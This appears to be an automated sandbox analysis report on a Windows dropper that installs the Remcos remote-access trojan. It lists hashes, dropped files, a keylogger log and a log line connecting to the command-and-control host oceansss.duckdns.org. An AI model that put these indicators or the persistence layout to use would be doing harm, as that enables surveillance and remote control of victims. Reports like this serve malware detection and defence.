SSDEEP: 24576:7MkT4gLKu9KKozJQd/HJNRO/B8M6wIJp4m+3bu8U2flxAv:QkTpT9K1mzy8M6wW4mEQ2W
MD5: DA7C2473B5C455F25F420827AF596286
SHA1: 101B5F991A26FC9213C4445BD9BFDB87A6A6C5CB
SHA-256: E1CECFCC4EED2F4B74AF7D971DCF24555534DB164DDB0B7CD1E821B2F0402703
SHA-512: CD6B9CD996C3BCA3AA0BE5D0CEBEBB7DB1701878D5C62354D6DF4C880D4AF8007C95BAF7F0AC9E75B099C7B3573DC23AFA3A872213A9963B84C86028E6969959
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 71%
• Antivirus: Virustotal, Detection: 73%
Joe Sandbox View:
• Filename: HFiHWvPsvA.rtf, Detection: malicious
• Filename: payment swift.xls, Detection: malicious

Process: C:\Users\user\Desktop\fu56fbrtn8.exe
File Type: ASCII text, with CRLF line terminators
Category: modified
Size (bytes): 26
Entropy (8bit): 3.95006375643621
Encrypted: false
SSDEEP: 3:ggPYV:rPYV
MD5: 187F488E27DB4AF347237FE461A079AD
SHA1: 6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256: 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512: 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious: false
Preview: [ZoneTransfer]....ZoneId=0

Process: C:\ProgramData\Remcos\remcos.exe
File Type: data
Category: modified
Size (bytes): 588
Entropy (8bit): 3.3799064913996024
Encrypted: false
SSDEEP: 12:6lPKecFb5SpE/WFe5BWFe5BWFe5BWFe5BWItN25MMl:6ZcpYE/WqBWqBWqBWqBWIt/Ml
MD5: 1B45D31EEAF80B8A2AD9746AA274CE3D
SHA1: 9C37206D10732478017FB2A08A64700480DCE58A
SHA-256: 2C47299E573335BC16DF22DBEE1D85A9A88AC58FD7DB7E8E2D830BBB6B2D5813
SHA-512: 24F9A90F64D5D4EDDF4EC217BEAB33161BF30FB832A8E6377939A6F51367B74E7669638C98A2D1577DF2490E7F9C856A5CE5D91A740F25B5215FC90B0C195E35
Malicious: true
Yara Hits:
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\fgdghrd\logs.dat, Author: Joe Security
Preview (UTF-16, decoded): [2024/04/24 07:20:39 Offline Keylogger Started] [C:\ProgramData\Remcos\remcos.exe] [Program Manager] [Win]r [Run] [Program Manager] [Win]r [Run] [Program Manager] [Win]r [Run] [Program Manager] [Win]r [Run] [Program Manager] { User has been idle for 0 minutes }

Process: C:\Users\user\Desktop\fu56fbrtn8.exe
File Type: MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Cmzcxhwn.PIF">), ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 100
Entropy (8bit): 5.076405505932685
Encrypted: false
SSDEEP: 3:HRAbABGQYmTWAX+rSF55i0XMmuTsb6cyoOovn:HRYFVmTWDyzSTE3yoOy
MD5: 72C05F885ED3056C0DF8281254BAE799
SHA1: BE669321E3F9606DB8BE8FFB42BD0CA16597EA7B
SHA-256: F4FB38198E6FC7C2B2C07D0B0EC8968803FBD433FD19962A543A891C25EF24DB
SHA-512: E7FFB220E711DAA9F4C4AB827DBDDB31B75466283E9787B10D794ADCA4445490DA13E3957911EA03BB3A048BB6A6E382A329DA71FE02A6908FA6B0CB7DEE7A99
Malicious: true
Preview: [InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Cmzcxhwn.PIF"..IconIndex=29..HotKey=25..

Process: C:\Users\user\Desktop\fu56fbrtn8.exe
File Type: data
Category: dropped
Size (bytes): 838832
Entropy (8bit): 7.166482987551088
Encrypted: false
SSDEEP: 12288:I8ipI/oJsWu16ZmsSgSmmPIQwjkH8fvvkKGVmfSpEiEhMfHU0MlXk5:Ini/K9tSmmPVwjkcmu2EIHxMlXS
MD5: 6DBB10D6B60E1A87F5F5346685AA9E81
SHA1: 516A19B05660C0F80208B85FA0FCF60B8E2F86A5
SHA-256: 5A863615FE982204BFC576576DFC7C5A06C1DDB029ACF1EC7F37F79541ABE750
SHA-512: FF6028B2D925241F371D5775D0FBFA516795552E0A7526C69A372D071C5A0133F51E9B6D014A9364370573C3A9910CDC14935AC80BAE12A3E6F0262E484BF185
Malicious: true

Process: C:\Windows\SysWOW64\extrac32.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1639424
Entropy (8bit): 7.422807171812134
Encrypted: false
SSDEEP: 24576:7MkT4gLKu9KKozJQd/HJNRO/B8M6wIJp4m+3bu8U2flxAv:QkTpT9K1mzy8M6wW4mEQ2W
MD5: DA7C2473B5C455F25F420827AF596286
SHA1: 101B5F991A26FC9213C4445BD9BFDB87A6A6C5CB
SHA-256: E1CECFCC4EED2F4B74AF7D971DCF24555534DB164DDB0B7CD1E821B2F0402703
SHA-512: CD6B9CD996C3BCA3AA0BE5D0CEBEBB7DB1701878D5C62354D6DF4C880D4AF8007C95BAF7F0AC9E75B099C7B3573DC23AFA3A872213A9963B84C86028E6969959
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 71%
• Antivirus: Virustotal, Detection: 73%
Joe Sandbox View:
• Filename: HFiHWvPsvA.rtf, Detection: malicious
• Filename: payment swift.xls, Detection: malicious

Process: C:\Users\user\Desktop\fu56fbrtn8.exe
File Type: Unicode text, UTF-16, little-endian text, with very long lines (15012), with no line terminators
Category: dropped
Size (bytes): 30026
Entropy (8bit): 3.9380000056299878
Encrypted: false
SSDEEP: 192:IBOY7cKQ/CyntVZjpubO0bXWQtagxP2+3o5WIGbfJTAy:C
MD5: 828FFBF60677999579DAFE4BF3919C63
SHA1: A0D159A1B9A49E9EACCC53FE0C3266C0526A1BDC
SHA-256: ABAC4A967800F5DA708572EC42441EC373CD52459A83A8A382D6B8579482789D
SHA-512: BF00909E24C5A6FB2346E8457A9ADACD5F1B35988D90ABBDE9FF26896BBB59EDAFEA60D9DB4D10182A7B5E129BB69585D3E20BC5C63AF3517B3A7EF1E45FFB7E
Malicious: false
Yara Hits:
• Rule: MALWARE_BAT_KoadicBAT, Description: Koadic post-exploitation framework BAT payload, Source: C:\Users\Public\Libraries\CmzcxhwnO.bat, Author: ditekSHen

Process: C:\Users\user\Desktop\fu56fbrtn8.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 4
Entropy (8bit): 1.5
Encrypted: false
SSDEEP: 3:K:K
MD5: C76F4263837A36D85C6503D15252058C
SHA1: 7E49F1F05AD3FBD95F696875635140006430C437
SHA-256: 4410E1233468A479D21F029A0832B94FDD3A0BFB1300266EE5EA62D81AA371C8
SHA-512: 5D1795C6D11CE5F3BBBB224C483862F5D8FA9CEFF1384ACEA179E5780E183924B01690F7855A958903DE060D7A1FA5857A15F2077FB3D3C5ADC7CAA859DFA9C3
Malicious: false
Preview: 66..

Process: C:\Users\user\Desktop\fu56fbrtn8.exe
File Type: DOS batch file, ASCII text, with very long lines (468), with CRLF line terminators
Category: dropped
Size (bytes): 3646
Entropy (8bit): 5.383959173452972
Encrypted: false
SSDEEP: 96:Zx2A0d5a9zHPwo0uP6SXjr4XtgPmon38JV7ZVhvoXS966hYxcdF4AlM5NQYE2Pl+:3L6jThc/pkmZAXpA2
MD5: 71E46EFE9932B83B397B44052513FB49
SHA1: 741AF3B8C31095A0CC2C39C41E62279684913205
SHA-256: 11C20FABF677CD77E8A354B520F6FFCA09CAC37CE15C9932550E749E49EFE08A
SHA-512: 76DA3B441C0EAAAABDD4D21B0A3D4AA7FD49D73A5F0DAB2CFB39F2E114EFE4F4DABE2D46B01B66D810D6E0EFA97676599ECE5C213C1A69A5F2F4897A9B4AC8DA
Malicious: false

Process: C:\Users\user\Desktop\fu56fbrtn8.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 131648
Entropy (8bit): 5.225468064273746
Encrypted: false
SSDEEP: 3072:zar2xXibKcf5K67+k02XbFbosspwUUgcR:Nibl7+k02XZb9UA
MD5: 231CE1E1D7D98B44371FFFF407D68B59
SHA1: 25510D0F6353DBF0C9F72FC880DE7585E34B28FF
SHA-256: 30951DB8BFC21640645AA9144CFEAA294BB7C6980EF236D28552B6F4F3F92A96
SHA-512: 520887B01BDA96B7C4F91B9330A5C03A12F7C7F266D4359432E7BACC76B0EEF377C05A4361F8FA80AD0B94B5865699D747A5D94A2D3DCDB85DABF5887BB6C612
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
• Antivirus: Virustotal, Detection: 0%
Joe Sandbox View:
• Filename: FT. 40FE CNY .xlsx.lnk, Detection: malicious
• Filename: HFiHWvPsvA.rtf, Detection: malicious
• Filename: payment swift.xls, Detection: malicious
• Filename: VdwJB2cS5l.exe, Detection: malicious
• Filename: SecuriteInfo.com.Win32.RATX-gen.9491.24773.exe, Detection: malicious
• Filename: Purchase order.exe, Detection: malicious
• Filename: Quotation 20242204.exe, Detection: malicious
                                                                                                                                                  • Filename: pSfqOmM1DG.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: XY2I8rWLkM.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: 2020.xls, Detection: malicious, Browse
Process:C:\Users\user\Desktop\fu56fbrtn8.exe
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):116908
Entropy (8bit):5.087211878722834
Encrypted:false
SSDEEP:1536:AxdWID3z1y5XtsBms9bOPu5jDqWte6VNCl7MbiRvRRJHu:AxdB/usBLOP8qWte6VQRRJHu
MD5:566B326055C3ED8E2028AA1E2C1054D0
SHA1:C25FA6D6369C083526CAFCF45B5F554635AFE218
SHA-256:A692D4305B95E57E2CFC871D53A41A5BFC9E306CB1A86CA1159DB4F469598714
SHA-512:DA4B0B45D47757B69F9ABC1817D3CB3C85DEB08658E55F07B016FBA053EFE541A5791B9B2B380C25B440BBAE6916C5A2245261553CA3C5025D9D55C943F9823C
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: ReversingLabs, Detection: 83%
• Antivirus: Virustotal, Detection: 68%
Process:C:\ProgramData\Remcos\remcos.exe
File Type:JSON data
Category:dropped
Size (bytes):965
Entropy (8bit):5.0061630437862155
Encrypted:false
SSDEEP:12:tkbOnd6UGkMyGWKyGXPVGArwY3o/IomaoHNmGNArpv/mOAaNO+ao9W7iN5zzkw7T:qbCdVauKyGX85jrvXhNlT3/7sYDsro
MD5:664DA71A99A7A7C426134240B73EF767
SHA1:33EAC84BB6B07F00593F05413A64CD8738B8A6E7
SHA-256:146F13F7649B0BB05ECAA2386D7E8DC23E5BA7B69A36919E17E994E63E9F7BA5
SHA-512:DCA9DC8FE7ED040B134D138846C0F3BA940DBCBE9883E19E704D06B8CA737E3FE4EE08AC5F98814E804E7D7716B580FBC4F7971AAD9DDC3887565FD07C4C674D
Malicious:false
Preview:{. "geoplugin_request":"154.16.105.36",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Las Vegas",. "geoplugin_region":"Nevada",. "geoplugin_regionCode":"NV",. "geoplugin_regionName":"Nevada",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"839",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"36.1685",. "geoplugin_longitude":"-115.1164",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/Los_Angeles",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
Process:C:\ProgramData\Remcos\remcos.exe
File Type:Extensible storage engine DataBase, version 0x620, checksum 0xfdd81a22, page size 32768, DirtyShutdown, Windows version 10.0
Category:dropped
Size (bytes):15728640
Entropy (8bit):0.9443644641193542
Encrypted:false
SSDEEP:12288:wKCS8rMTkTaTeUZT+T5SFnTKXpmljVvK:wKrTGW
MD5:080D97E922C1C94DFF9506548AD69ED2
SHA1:43A7F133E1E57ED40FE1C2BD48BF0FDCD0D11E0E
SHA-256:DC9F1D617E043E9509E9C10868898DB14DCD5C1A4A10832B9AD0357884748997
SHA-512:7D39BBFCFFB81326657983A099EFF341E088AC1D506DCD944B590B877AE7D51D4E6E7DAB330F0F742B8C93724060D93535805122D7C315CD2370312DC0785A22
Malicious:false
Process:C:\ProgramData\Remcos\remcos.exe
File Type:Extensible storage engine DataBase, version 0x620, checksum 0xfdd81a22, page size 32768, DirtyShutdown, Windows version 10.0
Category:dropped
Size (bytes):15728640
Entropy (8bit):0.9503688979690579
Encrypted:false
SSDEEP:12288:wKCS8r8TkTaTeUZT+T5SFnTKXpmljVJl:wKbTGW
MD5:54A3A7C1DD861626D7759F495D6C94D6
SHA1:1B05DB9EA6781A193986D935FE5E8B7BD468AE2D
SHA-256:984B1A4F672001A27DF94BDBAC91639D5E1EBA7428E1AA73E61C04DACA51C0D1
SHA-512:3F90890FA4F11EE442796D1A188E55DA6F81EB26B2AAB5C38F826495F680472A5644F7D665E5DCD21E15216930F8BA6F84DA3865957AF0E6D9693E3A626F3321
Malicious:false
                                                                                                                                                  Process:C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2
                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:Qn:Qn
                                                                                                                                                  MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:..
                                                                                                                                                  Process:C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2
                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:Qn:Qn
                                                                                                                                                  MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:..
                                                                                                                                                  Process:C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                  File Type:ISO-8859 text, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):624
                                                                                                                                                  Entropy (8bit):4.520545489563329
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:caFqFkLmxyRbmkclkL6hnRRJzI9X/XqdX4XljW3nQsW3vygGn:7QFtUbmjlpRb+yWXxW3/W3k
                                                                                                                                                  MD5:724DED658FED593BC4FBD00EE468B3BF
                                                                                                                                                  SHA1:9A5620449C45468EAD2E2F4CA3D588938C135BEE
                                                                                                                                                  SHA-256:549C274DE97EB69F29900A926DA4CDC6468A0A32FDF5EFFFE66766F99847343C
                                                                                                                                                  SHA-512:0575DB29C03D44B18300613925247A1544C0C178BB5364CFF06B8CB2FEFBBACBA22910C236FC96B159DCAC1AE840A3BDA016D79FE12455EDA1CA602C37A081F2
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:... ______ ...(_____ \ ... _____) )_____ ____ ____ ___ ___ ...| __ /| ___ | \ / ___) _ \ /___)...| | \ \| ____| | | ( (__| |_| |___ |...|_| |_|_____)_|_|_|\____)___/(___/ .....Remcos v4.9.4 Pro.... BreakingSecurity.net....07:20:39:763 i | Remcos Agent initialized..07:20:39:763 i | Offline Keylogger Started..07:20:39:763 i | Access Level: Administrator..07:20:39:763 i | Connecting | TLS Off | oceansss.duckdns.org:1144..07:20:40:402 i | Connected | TLS Off | oceansss.duckdns.org:1144..07:20:40:906 i | KeepAlive | Enabled | Timeout: 60..
                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Entropy (8bit):7.422807171812134
                                                                                                                                                  TrID:
                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.66%
                                                                                                                                                  • Win32 Executable Delphi generic (14689/80) 0.15%
                                                                                                                                                  • Windows Screen Saver (13104/52) 0.13%
                                                                                                                                                  • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                  File name:fu56fbrtn8.exe
                                                                                                                                                  File size:1'639'424 bytes
                                                                                                                                                  MD5:da7c2473b5c455f25f420827af596286
                                                                                                                                                  SHA1:101b5f991a26fc9213c4445bd9bfdb87a6a6c5cb
                                                                                                                                                  SHA256:e1cecfcc4eed2f4b74af7d971dcf24555534db164ddb0b7cd1e821b2f0402703
                                                                                                                                                  SHA512:cd6b9cd996c3bca3aa0be5d0cebebb7db1701878d5c62354d6df4c880d4af8007c95baf7f0ac9e75b099c7b3573dc23afa3a872213a9963b84c86028e6969959
                                                                                                                                                  SSDEEP:24576:7MkT4gLKu9KKozJQd/HJNRO/B8M6wIJp4m+3bu8U2flxAv:QkTpT9K1mzy8M6wW4mEQ2W
                                                                                                                                                  TLSH:B575BE51B790D1B3E03B10FED73AB5D862CDBAA4295374CCB2D50A7BDE37982244524E
                                                                                                                                                  File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
Icon Hash: 3575b4a8b0b085d1
Entrypoint: 0x4575c0
Entrypoint Section: CODE
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp: 0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 55bb4abe492867a8202968458cfd638d
Instruction
push ebp
mov ebp, esp
add esp, FFFFFFF0h
mov eax, 00457400h
call 00007FA868D6A6B5h
mov eax, dword ptr [0056C65Ch]
mov eax, dword ptr [eax]
call 00007FA868DB2A29h
mov ecx, dword ptr [0056C740h]
mov eax, dword ptr [0056C65Ch]
mov eax, dword ptr [eax]
mov edx, dword ptr [00456D98h]
call 00007FA868DB2A29h
mov eax, dword ptr [0056C65Ch]
mov eax, dword ptr [eax]
call 00007FA868DB2A9Dh
call 00007FA868D68670h
lea eax, dword ptr [eax+00h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x171000 | 0x78 | .edata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x16e000 | 0x2066 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x17b000 | 0x1c600 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x174000 | 0x6328 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x173000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
CODE | 0x1000 | 0x56608 | 0x56800 | e749dfadfcac9668fb6395a24d87ee54 | False | 0.5225823022037572 | data | 6.515156263316965 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA | 0x58000 | 0x1147cc | 0x114800 | fd59e5a635ce7a9c0333402e3d827865 | False | 0.7515946400316456 | data | 7.548878208451603 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
BSS | 0x16d000 | 0xd5d | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x16e000 | 0x2066 | 0x2200 | 3aa6d5d6785cddb9a5bee660a602eb8e | False | 0.35340073529411764 | data | 4.887767818013599 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata | 0x171000 | 0x78 | 0x200 | 86a99c9586c90c6cc57ed7fd9ed47346 | False | 0.2109375 | data | 1.5388005609521742 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.tls | 0x172000 | 0x10 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x173000 | 0x18 | 0x200 | 9d1bba21368430faa0bf768fbfaa7fe5 | False | 0.05078125 | MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "W" | 0.2069200177871819 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc | 0x174000 | 0x6328 | 0x6400 | 3a96abebf4210d131401c2199c50cc0a | False | 0.6482421875 | data | 6.687430221930037 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc | 0x17b000 | 0x1c600 | 0x1c600 | 76ae21a9e1fd9d25b479364b03fa95c9 | False | 0.13988504955947137 | data | 4.178255960193848 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0x17b800 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | | | 0.38636363636363635
RT_CURSOR | 0x17b934 | 0x134 | data | | | 0.4642857142857143
RT_CURSOR | 0x17ba68 | 0x134 | data | | | 0.4805194805194805
RT_CURSOR | 0x17bb9c | 0x134 | data | | | 0.38311688311688313
RT_CURSOR | 0x17bcd0 | 0x134 | data | | | 0.36038961038961037
RT_CURSOR | 0x17be04 | 0x134 | data | | | 0.4090909090909091
RT_CURSOR | 0x17bf38 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | | | 0.4967532467532468
RT_ICON | 0x17c06c | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3779 x 3779 px/m | | | 0.28635084427767354
RT_ICON | 0x17d114 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 3779 x 3779 px/m | | | 0.18278008298755186
RT_ICON | 0x17f6bc | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 20736, resolution 3779 x 3779 px/m | | | 0.11275415896487985
RT_ICON | 0x184b44 | 0x67e8 | Device independent bitmap graphic, 80 x 160 x 32, image size 25600, resolution 3779 x 3779 px/m | | | 0.10086466165413534
RT_ICON | 0x18b32c | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 36864, resolution 3779 x 3779 px/m | | | 0.08608366617616145
RT_STRING | 0x1947d4 | 0x1d4 | AmigaOS bitmap font "n", fc_YSize 27392, 18688 elements, 2nd "S", 3rd | | | 0.43162393162393164
RT_STRING | 0x1949a8 | 0x1c8 | data | | | 0.4298245614035088
RT_STRING | 0x194b70 | 0xe8 | data | | | 0.603448275862069
RT_STRING | 0x194c58 | 0x2f8 | data | | | 0.45
RT_STRING | 0x194f50 | 0xd8 | data | | | 0.5879629629629629
RT_STRING | 0x195028 | 0x22c | data | | | 0.48201438848920863
RT_STRING | 0x195254 | 0x3f4 | data | | | 0.3715415019762846
RT_STRING | 0x195648 | 0x370 | data | | | 0.39431818181818185
RT_STRING | 0x1959b8 | 0x3e8 | data | | | 0.33
RT_STRING | 0x195da0 | 0x234 | data | | | 0.475177304964539
RT_STRING | 0x195fd4 | 0xec | data | | | 0.5508474576271186
RT_STRING | 0x1960c0 | 0x1b4 | data | | | 0.5206422018348624
RT_STRING | 0x196274 | 0x3e4 | data | | | 0.32028112449799195
RT_STRING | 0x196658 | 0x358 | data | | | 0.4158878504672897
RT_STRING | 0x1969b0 | 0x2b4 | data | | | 0.4060693641618497
RT_RCDATA | 0x196c64 | 0x10 | data | | | 1.5
RT_RCDATA | 0x196c74 | 0x22c | data | | | 0.7751798561151079
RT_RCDATA | 0x196ea0 | 0x652 | Delphi compiled form 'TForm1' | | | 0.43325092707045737
RT_GROUP_CURSOR | 0x1974f4 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.25
RT_GROUP_CURSOR | 0x197508 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.25
RT_GROUP_CURSOR | 0x19751c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
RT_GROUP_CURSOR | 0x197530 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
RT_GROUP_CURSOR | 0x197544 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
RT_GROUP_CURSOR | 0x197558 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
RT_GROUP_CURSOR | 0x19756c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
RT_GROUP_ICON | 0x197580 | 0x4c | data | | | 0.8421052631578947
DLL | Import
kernel32.dll | DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
